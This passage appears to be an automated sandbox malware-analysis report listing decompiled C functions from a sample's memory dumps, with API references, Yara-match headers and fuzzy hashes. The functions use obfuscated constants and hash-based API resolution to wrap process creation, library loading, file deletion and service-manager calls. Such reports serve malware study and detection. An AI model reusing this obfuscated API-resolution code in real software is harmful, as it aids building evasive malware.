                                          				signed int _v8;
                                          				unsigned int _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				intOrPtr _v28;
                                          				void* _t29;
                                          				intOrPtr* _t33;
                                          				void* _t34;
                                          
                                          				E007A602B(_t29);
                                          				_v28 = 0x4fe02f;
                                          				_v24 = 0x232390;
                                          				_v20 = 0xf8460;
                                          				_v16 = 0;
                                          				_v12 = 0xf625;
                                          				_v12 = _v12 >> 6;
                                          				_v12 = _v12 >> 0xa;
                                          				_v12 = _v12 + 0xffffcc6f;
                                          				_v12 = _v12 ^ 0xffffa5b6;
                                          				_v8 = 0xe5cd;
                                          				_v8 = _v8 + 0xffffae4d;
                                          				_v8 = _v8 | 0xf8bbefe7;
                                          				_v8 = _v8 ^ 0xf8bbcc9a;
                                          				_t33 = E007B07A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
                                          				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
                                          				return _t34;
                                          			}













                                          APIs
                                          • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 007AC762
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2098980384.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true
                                          • Associated: 00000009.00000002.2098970238.00000000007A0000.00000004.00000001.sdmp
                                          • Associated: 00000009.00000002.2099057824.00000000007BC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: FolderPath
                                          • String ID: /O
                                          • API String ID: 1514166925-1923427199
                                          • Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                          • Instruction ID: e9a86e8e37b7de8203378364023d38d806515300457840ddf2b215e3c811edbb
                                          • Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                          • Instruction Fuzzy Hash: 2E1122B290122DBBCB259F94DC498DFBEB9EF05714F108188F90962210D7714A659BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 82%
                                          			E007A1000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				void* _t33;
                                          				struct HINSTANCE__* _t40;
                                          				signed int _t42;
                                          
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				E007A602B(_t33);
                                          				_v16 = _v16 & 0x00000000;
                                          				_v24 = 0x1b2eda;
                                          				_v20 = 0x33a3b7;
                                          				_v12 = 0x98c;
                                          				_v12 = _v12 + 0xb426;
                                          				_v12 = _v12 + 0x5beb;
                                          				_t42 = 0x63;
                                          				_v12 = _v12 / _t42;
                                          				_v12 = _v12 ^ 0x00000fce;
                                          				_v8 = 0x120e;
                                          				_v8 = _v8 + 0xfffffcb8;
                                          				_v8 = _v8 + 0xffffefaa;
                                          				_v8 = _v8 >> 5;
                                          				_v8 = _v8 ^ 0x07ff9a02;
                                          				E007B07A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
                                          				_t40 = LoadLibraryW(_a12); // executed
                                          				return _t40;
                                          			}












                                          APIs
                                          • LoadLibraryW.KERNEL32(0033A3B7), ref: 007A1096
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2098980384.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true
                                          • Associated: 00000009.00000002.2098970238.00000000007A0000.00000004.00000001.sdmp
                                          • Associated: 00000009.00000002.2099057824.00000000007BC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID: [
                                          • API String ID: 1029625771-3431493590
                                          • Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                          • Instruction ID: 286b32172467e8b2513f1050e968d30947f2b42d0733e7bc148998b90b461b9a
                                          • Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                          • Instruction Fuzzy Hash: A5016DB6D0130CFBDF04DFA4C94AADEBBB1EF54318F108188E51466291D7B19B649B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E007A4859() {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t22;
                                          
                                          				_v12 = 0xafe2;
                                          				_v12 = _v12 * 0x42;
                                          				_v12 = _v12 + 0xffffdd89;
                                          				_v12 = _v12 ^ 0x002d198d;
                                          				_v8 = 0x5b09;
                                          				_v8 = _v8 | 0xa1ea9544;
                                          				_v8 = _v8 * 0x12;
                                          				_v8 = _v8 ^ 0x6283d9c1;
                                          				E007B07A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
                                          				ExitProcess(0);
                                          			}







                                          APIs
                                          • ExitProcess.KERNELBASE(00000000), ref: 007A48B7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2098980384.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true
                                          • Associated: 00000009.00000002.2098970238.00000000007A0000.00000004.00000001.sdmp
                                          • Associated: 00000009.00000002.2099057824.00000000007BC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID: [
                                          • API String ID: 621844428-1822564810
                                          • Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                          • Instruction ID: 4ea4bf6190abebc6345f7dd47a99b9ed50677059344869cbce81c2b57805d603
                                          • Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                          • Instruction Fuzzy Hash: E8F017B0A05209FBDB04CFE8CA56A9EBFB9EB40301F20818CE444B7290E7B15F509B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 66%
                                          			E007B4F7D(void* __ecx, void* __edx, void* _a4) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t17;
                                          				int _t24;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E007A602B(_t17);
                                          				_v12 = 0xddd8;
                                          				_v12 = _v12 * 0x48;
                                          				_v12 = _v12 ^ 0x003e66d8;
                                          				_v8 = 0xcb35;
                                          				_v8 = _v8 ^ 0x7b88573c;
                                          				_v8 = _v8 * 0x59;
                                          				_v8 = _v8 ^ 0xf27e4a21;
                                          				E007B07A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
                                          				_t24 = CloseHandle(_a4); // executed
                                          				return _t24;
                                          			}








                                          APIs
                                          • CloseHandle.KERNELBASE(003E66D8), ref: 007B4FE2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2098980384.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true
                                          • Associated: 00000009.00000002.2098970238.00000000007A0000.00000004.00000001.sdmp
                                          • Associated: 00000009.00000002.2099057824.00000000007BC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID: {#lm
                                          • API String ID: 2962429428-1564096886
                                          • Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                          • Instruction ID: e3dad91b9b52d58f11f7dc5270ad02058aaf6527cba4fe69feafc317bc48b7e0
                                          • Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                          • Instruction Fuzzy Hash: FCF037B081120CFFDF04DFA4D94689EBFBAEB40300F208299E804AB250D7715B509B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 21%
                                          			E007B976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				void* _t34;
                                          				int _t39;
                                          				struct _PROCESS_INFORMATION* _t48;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_t48 = __edx;
                                          				_push(0);
                                          				_push(_a68);
                                          				_push(0);
                                          				_push(_a60);
                                          				_push(_a56);
                                          				_push(_a52);
                                          				_push(0);
                                          				_push(_a44);
                                          				_push(_a40);
                                          				_push(0);
                                          				_push(0);
                                          				_push(_a28);
                                          				_push(_a24);
                                          				_push(_a20);
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__edx);
                                          				_push(__ecx);
                                          				E007A602B(_t34);
                                          				_v12 = 0xaff9;
                                          				_v12 = _v12 | 0xcee54bd1;
                                          				_v12 = _v12 + 0x6ed6;
                                          				_v12 = _v12 ^ 0xcee61221;
                                          				_v8 = 0x6229;
                                          				_v8 = _v8 ^ 0x42aa9f31;
                                          				_v8 = _v8 >> 2;
                                          				_v8 = _v8 ^ 0x10aad83f;
                                          				E007B07A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
                                          				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
                                          				return _t39;
                                          			}









                                          APIs
                                          • CreateProcessW.KERNEL32(007A591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,007A591A), ref: 007B9816
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2098980384.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true
                                          • Associated: 00000009.00000002.2098970238.00000000007A0000.00000004.00000001.sdmp
                                          • Associated: 00000009.00000002.2099057824.00000000007BC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                          • Instruction ID: 106350383b1bf39c4c23831b759dc2dbcd108dd66316b1276b5e4b075e754bda
                                          • Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                          • Instruction Fuzzy Hash: 4711D372800148FBDF199F92DC0ACDF7F3AEF89750F104148FA1452120D2768A60EBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 31%
                                          			E007AB566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				void* _t32;
                                          				void* _t38;
                                          				long _t47;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a48);
                                          				_t47 = __edx;
                                          				_push(_a44);
                                          				_push(_a40);
                                          				_push(_a36);
                                          				_push(_a32);
                                          				_push(_a28);
                                          				_push(_a24);
                                          				_push(0);
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__edx);
                                          				_push(0);
                                          				E007A602B(_t32);
                                          				_v8 = 0xfd14;
                                          				_v8 = _v8 >> 4;
                                          				_v8 = _v8 * 0x7a;
                                          				_v8 = _v8 >> 9;
                                          				_v8 = _v8 ^ 0x00002bef;
                                          				_v12 = 0x4f26;
                                          				_v12 = _v12 | 0xe7e97f76;
                                          				_v12 = _v12 ^ 0xe7e94dbb;
                                          				E007B07A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
                                          				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
                                          				return _t38;
                                          			}









                                          APIs
                                          • CreateFileW.KERNELBASE(007B0668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,007B0668,?,?,?,?), ref: 007AB5FD
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2098980384.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true
                                          • Associated: 00000009.00000002.2098970238.00000000007A0000.00000004.00000001.sdmp
                                          • Associated: 00000009.00000002.2099057824.00000000007BC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                          • Instruction ID: 82a14351892a751336632add9106223c7e80d56c520847f727f77829c527bb16
                                          • Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                          • Instruction Fuzzy Hash: F511B072801248BBDF169F95DD0ACEE7F7AEF89314F148198FA1862120D2769A60EB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 54%
                                          			E007B981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t22;
                                          				void* _t28;
                                          				void* _t34;
                                          				long _t37;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a16);
                                          				_t34 = __edx;
                                          				_t37 = __ecx;
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__edx);
                                          				_push(__ecx);
                                          				E007A602B(_t22);
                                          				_v12 = 0xe68;
                                          				_v12 = _v12 * 0x39;
                                          				_v12 = _v12 ^ 0xd1b1d871;
                                          				_v12 = _v12 ^ 0xd1b2fb7e;
                                          				_v8 = 0x629e;
                                          				_v8 = _v8 + 0xfffff5da;
                                          				_v8 = _v8 | 0xbef7b77b;
                                          				_v8 = _v8 ^ 0xbef79fc3;
                                          				E007B07A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
                                          				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
                                          				return _t28;
                                          			}










                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,007A87F2,0000CAAE,0000510C,AD82F196), ref: 007B989B
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2098980384.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true
                                          • Associated: 00000009.00000002.2098970238.00000000007A0000.00000004.00000001.sdmp
                                          • Associated: 00000009.00000002.2099057824.00000000007BC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                          • Instruction ID: 181ddc80a47fbe3fbeff89c703e2d33791be3369811d9a2f3f04186ef97f403b
                                          • Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                          • Instruction Fuzzy Hash: 6C019A72801208FBDF04EFE5D84ACDFBF79EF85310F108188F908A6220E6715B619BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 62%
                                          			E007B7BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t24;
                                          				int _t31;
                                          				signed int _t33;
                                          				struct _SHFILEOPSTRUCTW* _t40;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a12);
                                          				_t40 = __ecx;
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E007A602B(_t24);
                                          				_v8 = 0xa117;
                                          				_t33 = 0x76;
                                          				_v8 = _v8 / _t33;
                                          				_v8 = _v8 >> 4;
                                          				_v8 = _v8 ^ 0x210fe703;
                                          				_v8 = _v8 ^ 0x210fdcea;
                                          				_v12 = 0xf1e9;
                                          				_v12 = _v12 << 9;
                                          				_v12 = _v12 ^ 0x01e3a445;
                                          				E007B07A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
                                          				_t31 = SHFileOperationW(_t40); // executed
                                          				return _t31;
                                          			}










                                          APIs
                                          • SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 007B7C67
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2098980384.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true
                                          • Associated: 00000009.00000002.2098970238.00000000007A0000.00000004.00000001.sdmp
                                          • Associated: 00000009.00000002.2099057824.00000000007BC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: FileOperation
                                          • String ID:
                                          • API String ID: 3080627654-0
                                          • Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                          • Instruction ID: 536c9ffa875a1eb34a730b66a55622bf98e2d6209e296d7a4e2cae8dab280425
                                          • Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                          • Instruction Fuzzy Hash: 3D0128B1901208FFEB09DFA4C84A9DEBBB9EB45314F208198F505A7240EAB15F609B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 52%
                                          			E007AF65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				void* _t24;
                                          				void* _t29;
                                          				int _t35;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a20);
                                          				_t35 = __ecx;
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E007A602B(_t24);
                                          				_v12 = 0xd5a7;
                                          				_v12 = _v12 ^ 0x994cba9d;
                                          				_v12 = _v12 ^ 0x994c19d3;
                                          				_v8 = 0xac88;
                                          				_v8 = _v8 << 3;
                                          				_v8 = _v8 >> 8;
                                          				_v8 = _v8 + 0xebed;
                                          				_v8 = _v8 ^ 0x0000ab82;
                                          				E007B07A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
                                          				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
                                          				return _t29;
                                          			}









                                          APIs
                                          • OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 007AF6D8
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2098980384.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true
                                          • Associated: 00000009.00000002.2098970238.00000000007A0000.00000004.00000001.sdmp
                                          • Associated: 00000009.00000002.2099057824.00000000007BC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: OpenService
                                          • String ID:
                                          • API String ID: 3098006287-0
                                          • Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                          • Instruction ID: 1aa1fa918a3dd380c14e4509bff9e99d9e8fdd885f9bf77fd439d302178ca718
                                          • Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                          • Instruction Fuzzy Hash: 3001E5B6901208BBEF059F94DC0A8DF7F75EB05324F148188F90462250D6B65E61DBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E007AB6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                          				signed int _v8;
                                          				unsigned int _v12;
                                          				void* _t23;
                                          				intOrPtr* _t27;
                                          				void* _t28;
                                          
                                          				E007A602B(_t23);
                                          				_v12 = 0x9431;
                                          				_v12 = _v12 >> 7;
                                          				_v12 = _v12 ^ 0x0000160f;
                                          				_v8 = 0xc972;
                                          				_v8 = _v8 ^ 0x829e0126;
                                          				_v8 = _v8 + 0x4512;
                                          				_v8 = _v8 + 0xffff18f9;
                                          				_v8 = _v8 ^ 0x829e24c1;
                                          				_t27 = E007B07A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
                                          				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
                                          				return _t28;
                                          			}









                                          APIs
                                          • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 007AB759
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2098980384.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true
                                          • Associated: 00000009.00000002.2098970238.00000000007A0000.00000004.00000001.sdmp
                                          • Associated: 00000009.00000002.2099057824.00000000007BC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: FileHandleInformation
                                          • String ID:
                                          • API String ID: 3935143524-0
                                          • Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                          • Instruction ID: 245dab289efc7ae8f9cedfaa9deac136d7d86aa22ac8cc0474dc49557940e97e
                                          • Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                          • Instruction Fuzzy Hash: 8E018FB194030CFBEF45DF90DD06E9E7BB5EF04704F108188FA0526190D7B15E209B51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E007BAA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                          				signed int _v8;
                                          				unsigned int _v12;
                                          				void* _t21;
                                          				int _t27;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E007A602B(_t21);
                                          				_v12 = 0xcc49;
                                          				_v12 = _v12 << 6;
                                          				_v12 = _v12 >> 2;
                                          				_v12 = _v12 ^ 0x000ca988;
                                          				_v8 = 0x5d85;
                                          				_v8 = _v8 | 0xb9d19a55;
                                          				_v8 = _v8 * 0xd;
                                          				_v8 = _v8 ^ 0x6fa87272;
                                          				E007B07A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
                                          				_t27 = DeleteFileW(_a12); // executed
                                          				return _t27;
                                          			}








                                          APIs
                                          • DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 007BAAA8
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2098980384.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true
                                          • Associated: 00000009.00000002.2098970238.00000000007A0000.00000004.00000001.sdmp
                                          • Associated: 00000009.00000002.2099057824.00000000007BC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteFile
                                          • String ID:
                                          • API String ID: 4033686569-0
                                          • Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                          • Instruction ID: f7845bce609a3b863407f447fa21ec69eca3b5a684c167219a78ee05fe94b98d
                                          • Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                          • Instruction Fuzzy Hash: C6F069B190020CFFDF08DFA4DD4A99FBFB5EB41304F108188F905A6250D7B69B649B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 70%
                                          			E007A5FB2(void* __ecx, void* __edx, void* _a4) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t21;
                                          				int _t27;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E007A602B(_t21);
                                          				_v12 = 0x33d;
                                          				_v12 = _v12 + 0xc3dc;
                                          				_v12 = _v12 | 0x39ccfb02;
                                          				_v12 = _v12 ^ 0x39ccf342;
                                          				_v8 = 0xe8d9;
                                          				_v8 = _v8 * 0x16;
                                          				_v8 = _v8 | 0x4145347f;
                                          				_v8 = _v8 ^ 0x9035ef96;
                                          				_v8 = _v8 ^ 0xd1609914;
                                          				E007B07A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
                                          				_t27 = CloseServiceHandle(_a4); // executed
                                          				return _t27;
                                          			}








                                          APIs
                                          • CloseServiceHandle.ADVAPI32(39CCF342), ref: 007A6025
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2098980384.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true
                                          • Associated: 00000009.00000002.2098970238.00000000007A0000.00000004.00000001.sdmp
                                          • Associated: 00000009.00000002.2099057824.00000000007BC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandleService
                                          • String ID:
                                          • API String ID: 1725840886-0
                                          • Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                          • Instruction ID: 64d33009b4a6430d23e7d4eee3dc2b1d6e098b9757e5ff21b8ad14c5562a8e73
                                          • Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                          • Instruction Fuzzy Hash: 35F04FB0C11208FFDB08DFA0E94689EBFB9EB40300F208198E509A7260E7755F559F54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Executed Functions

                                          C-Code - Quality: 62%
                                          			E00252959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				void* _t30;
                                          				void* _t39;
                                          				signed int _t41;
                                          				signed int _t42;
                                          
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(0);
                                          				_push(0);
                                          				E0025602B(_t30);
                                          				_v12 = 0x5e3c;
                                          				_t41 = 0x63;
                                          				_v12 = _v12 / _t41;
                                          				_t42 = 0x2f;
                                          				_v12 = _v12 / _t42;
                                          				_v12 = _v12 ^ 0x000064be;
                                          				_v8 = 0x74da;
                                          				_v8 = _v8 | 0xfefeeaea;
                                          				_v8 = _v8 >> 0xc;
                                          				_v8 = _v8 ^ 0x000fb531;
                                          				E002607A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
                                          				_t39 = OpenSCManagerW(0, 0, _a16); // executed
                                          				return _t39;
                                          			}










                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 002529DC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2099552528.0000000000251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                          • Associated: 0000000A.00000002.2099542294.0000000000250000.00000004.00000001.sdmp
                                          • Associated: 0000000A.00000002.2099594218.000000000026C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ManagerOpen
                                          • String ID: <^
                                          • API String ID: 1889721586-3203995635
                                          • Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                          • Instruction ID: 33dfa3c1d35cc9879a733454cfbeac04152e2f4093096828af0e7f85c150b977
                                          • Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                          • Instruction Fuzzy Hash: FC016D72A00108BFEB14DF95DC4A8DFBFB6EF44310F108088F508A6250D7B69F619B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E0025C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                          				signed int _v8;
                                          				unsigned int _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				intOrPtr _v28;
                                          				void* _t29;
                                          				intOrPtr* _t33;
                                          				void* _t34;
                                          
                                          				E0025602B(_t29);
                                          				_v28 = 0x4fe02f;
                                          				_v24 = 0x232390;
                                          				_v20 = 0xf8460;
                                          				_v16 = 0;
                                          				_v12 = 0xf625;
                                          				_v12 = _v12 >> 6;
                                          				_v12 = _v12 >> 0xa;
                                          				_v12 = _v12 + 0xffffcc6f;
                                          				_v12 = _v12 ^ 0xffffa5b6;
                                          				_v8 = 0xe5cd;
                                          				_v8 = _v8 + 0xffffae4d;
                                          				_v8 = _v8 | 0xf8bbefe7;
                                          				_v8 = _v8 ^ 0xf8bbcc9a;
                                          				_t33 = E002607A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
                                          				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
                                          				return _t34;
                                          			}













                                          APIs
                                          • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0025C762
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2099552528.0000000000251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                          • Associated: 0000000A.00000002.2099542294.0000000000250000.00000004.00000001.sdmp
                                          • Associated: 0000000A.00000002.2099594218.000000000026C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: FolderPath
                                          • String ID: /O
                                          • API String ID: 1514166925-1923427199
